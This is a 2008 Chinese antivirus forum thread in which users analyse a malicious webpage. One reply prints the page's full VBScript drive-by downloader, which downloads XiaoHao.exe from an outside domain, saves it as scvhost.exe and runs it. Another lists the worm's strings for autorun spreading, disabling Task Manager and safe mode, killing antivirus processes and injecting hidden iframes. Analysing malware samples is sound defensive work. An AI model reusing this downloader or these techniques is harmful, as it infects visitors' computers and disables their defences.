收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网马
12下一页
返回列表 发新帖
查看: 3455|回复: 18
收起左侧

[病毒样本] 网马

[复制链接]
风中漫步
发表于 2008-4-26 14:05:03 | 显示全部楼层 |阅读模式
不知道他这个是利用漏洞还是什么,请高手分析,谢谢

网址:http://www.158dm.cn/ index.htm
index前加了一个空格

内容:我传在附件里把

[ 本帖最后由 风中漫步 于 2008-4-26 14:10 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

jimmyleo
发表于 2008-4-26 14:10:57 | 显示全部楼层

  2. <script language="VBScript">
  3. on error resume next
  4. m1="object"
  5. m2="classid"
  6. m3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
  7. m4="Microsoft.XMLHTTP"
  8. m5="Shell.Application"
  9. MircoLong = "http://www.158dm.cn/XiaoHao.exe"
  10. Set MircoLongc = document.createElement(m1)
  11. MircoLongc.setAttribute m2, m3
  12. seturla="down"
  13. seturlb="file"
  14. seturlc="copy"
  15. seturld="exit"
  16. MircoLongi=m4
  17. Set MircoLongd = MircoLongc.CreateObject(MircoLongi,"")
  18. seturlf="Ado"
  19. seturlg="db."
  20. seturlh="Str"
  21. seturli="eam"
  22. MircoLongf=seturlf&seturlg&seturlh&seturli
  23. MircoLongg=MircoLongf
  24. set MircoLonga = MircoLongc.createobject(MircoLongg,"")
  25. MircoLonga.type = 1
  26. MircoLongh="GET"
  27. MircoLongd.Open MircoLongh, MircoLong, False
  28. MircoLongd.Send
  29. MircoLong9="scvhost.exe"
  30. set MircoLongb = MircoLongc.createobject("Scripting.FileSystemObject","")
  31. set MircoLonge = MircoLongb.GetSpecialFolder(2)
  32. MircoLonga.open
  33. MircoLong8="MircoLonga.BuildPath(MircoLonga,MircoLong8)"
  34. MircoLong7="MircoLongb.BuildPath(MircoLongb,MircoLong7)"
  35. MircoLong6="MircoLongc.BuildPath(MircoLongd,MircoLong6)"
  36. MircoLong5="MircoLongd.BuildPath(MircoLongf,MircoLong5)"
  37. MircoLong4="MircoLonge.BuildPath(MircoLongg,MircoLong4)"
  38. MircoLong3="MircoLongf.BuildPath(MircoLongh,MircoLong4)"
  39. MircoLong2="MircoLongg.BuildPath(MircoLongi,MircoLong3)"
  40. MircoLong1="MircoLongh.BuildPath(MircoLongg,MircoLong1)"
  41. MircoLong0="MircoLongi.BuildPath(MircoLongk,MircoLong0)"
  42. MircoLong9= MircoLongb.BuildPath(MircoLonge,MircoLong9)
  43. MircoLonga.write MircoLongd.responseBody
  44. MircoLonga.savetofile MircoLong9,2
  45. MircoLonga.close
  46. set MircoLonge = MircoLongc.createobject(m5,"")
  47. MircoLonge.ShellExecute MircoLong9,BBS,BBS,"open",0
  48. </script>
复制代码


小浩归来
回复

举报

风中漫步
 楼主| 发表于 2008-4-26 14:11:49 | 显示全部楼层
XiaoHao是?
回复

举报

Exia 该用户已被删除
发表于 2008-4-26 14:14:31 | 显示全部楼层
The file 'XiaoHao.exe' has been determined to be 'UNDER ANALYSIS'.
回复

举报

ranguangning
头像被屏蔽
发表于 2008-4-26 14:16:14 | 显示全部楼层
还是打不开

[ 本帖最后由 ranguangning 于 2008-4-26 14:27 编辑 ]
回复

举报

郁冰兰雪
发表于 2008-4-26 14:17:08 | 显示全部楼层
EAV无视!
回复

举报

shery0000
发表于 2008-4-26 14:18:32 | 显示全部楼层
不是以前那个小浩,图标变了
回复

举报

风中漫步
 楼主| 发表于 2008-4-26 14:22:34 | 显示全部楼层
原帖由 ranguangning 于 2008-4-26 14:16 发表
【1】网页打不开

【2】t="60$115$99$114$105$112$116$32$108$97$110$103$117$97$103$101$61$34$74$83$99$114$105$112$116$34$62$118$97$114$32$99$61$34$54$48$44$49$49$53$44$57$57$44$49$49$52$44$49$48$53$44$ ...


网址:http://www.158dm.cn/ index.htm
index前加了一个空格
回复

举报

aerbeisi
发表于 2008-4-26 14:26:44 | 显示全部楼层

快上HIPS

Prevx V2 20080426 2008-04-26 TROJAN.DOWNLOADER.GEN 4.725
QuickHeal 9.00 2008.04.26 2008-04-26 Suspicious - DNAScan 3.981
熊猫卫士 9.04.03.0001 2008.04.25 2008-04-25 Suspicious file 3.986
飞塔 2.81-3.11 9.16 2008-04-26 Suspicious 3.331


  1. CWormBegin  Xiaohao.com autorun.inf shell\Auto\command=Xiaohao.com
  2.     shellexecute=Xiaohao.com
  3.   shell\explore\Command=Xiaohao.com
  4. shell\explore=资源管理器(&X)
  5.   shell\open\Default=1
  6.   shell\open\Command=Xiaohao.com
  7.     shell\open=打开(&O)
  8.    open=Xiaohao.com
  9.   [Autorun]
  10. config.exe  Xiaohao.exe XiaoHao.exe xiaohao.exe KV*.exe Iparmor.exe Navapw32.exe    Rav.exe kavscr.exe  avp.exe jsp php aspx    asp html    htm *.* \   \exloroe.com    %s  open    http://%77%77%77%2E%31%35%38%64%6D%2E%63%6E/%62%64%2E%68%74%6D  
  11. <iframe src=http://%77%77%77%2E%31%35%38%64%6D%2E%63%6E/%61%31%2E%68%74%6D width=0 height=0></iframe> r+b ygr HACK     "%1" %*    exefile\shell\open\command  "%1" %* \\  A:\ NoBrowserOptions    Software\Policies\Microsoft\Internet Explorer\Restrictions  exloroe Software\Microsoft\Windows\CurrentVersion\Run   1   \word.com   C:\Documents and Settings\All Users\「开始」菜单\程序\启动  CheckedValue    SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL   DisableTaskMgr  Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr    Software\Microsoft\Windows\CurrentVersion\Policies\System   DisableRegistryTools    regfile\shell\open\command  Type    SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden  ShowSuperHidden Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced radio   Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL   NoFolderOptions Software\Microsoft\Windows\Current Version\Policies\Explorer\NoFolderOptions    SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}    SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}    SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}    SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}    AutoEndTasks    Control Panel\Desktop   NoCommon Groups Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommon Groups DisableCMD  Software\Policies\Microsoft\Windows\System
复制代码

[ 本帖最后由 aerbeisi 于 2008-4-26 17:56 编辑 ]
回复

举报

挪威的冬天
发表于 2008-4-26 14:26:49 | 显示全部楼层
xiaohao 金山 0
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-15 12:25 , Processed in 0.120435 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表